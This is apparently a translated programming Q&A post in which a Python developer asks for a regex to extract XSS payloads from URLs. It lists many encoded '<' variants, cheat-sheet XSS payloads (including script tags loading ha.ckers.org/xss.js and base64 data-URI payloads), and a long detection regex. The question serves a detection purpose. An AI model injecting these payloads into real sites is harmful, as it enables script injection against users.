正则表达式匹配以下列表中的所有XSS有效负载

时间:2017-09-26 15:47:22

标签: python regex python-2.7 payload

我需要一个匹配以下列表中所有XSS有效负载的正则表达式(我没有尝试过滤XSS请求并将URL保存为安全,我试图从中删除有效负载URL本身并将其保存到变量供以后使用):

http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24&lt
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&LT
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#60
http://www.example.com/subcat.php?id=24&#060
http://www.example.com/subcat.php?id=24&#0060
http://www.example.com/subcat.php?id=24&#00060
http://www.example.com/subcat.php?id=24&#000060
http://www.example.com/subcat.php?id=24&#0000060
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3c
http://www.example.com/subcat.php?id=24&#x03c
http://www.example.com/subcat.php?id=24&#x003c
http://www.example.com/subcat.php?id=24&#x0003c
http://www.example.com/subcat.php?id=24&#x00003c
http://www.example.com/subcat.php?id=24&#x000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3c
http://www.example.com/subcat.php?id=24&#X03c
http://www.example.com/subcat.php?id=24&#X003c
http://www.example.com/subcat.php?id=24&#X0003c
http://www.example.com/subcat.php?id=24&#X00003c
http://www.example.com/subcat.php?id=24&#X000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3C
http://www.example.com/subcat.php?id=24&#x03C
http://www.example.com/subcat.php?id=24&#x003C
http://www.example.com/subcat.php?id=24&#x0003C
http://www.example.com/subcat.php?id=24&#x00003C
http://www.example.com/subcat.php?id=24&#x000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3C
http://www.example.com/subcat.php?id=24&#X03C
http://www.example.com/subcat.php?id=24&#X003C
http://www.example.com/subcat.php?id=24&#X0003C
http://www.example.com/subcat.php?id=24&#X00003C
http://www.example.com/subcat.php?id=24&#X000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)

我确实设法找到一个并编辑它以匹配一些,但不是全部:

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=

有关示例,请参阅here,它只会匹配<script>,而其中一些不会与它们完全匹配。有没有人有一个更好的正则表达式,只匹配URL的XSS有效负载,或更好的方法来查找XSS有效负载?提前谢谢你。

1 个答案:

答案 0 :(得分:0)

使用内置库找到一种方法:

import urlparse

def find_xss_script(url, query=4):
    data = urlparse.urlparse(url)
    return data[query]

将返回类似:id=24&#x000003c;

的内容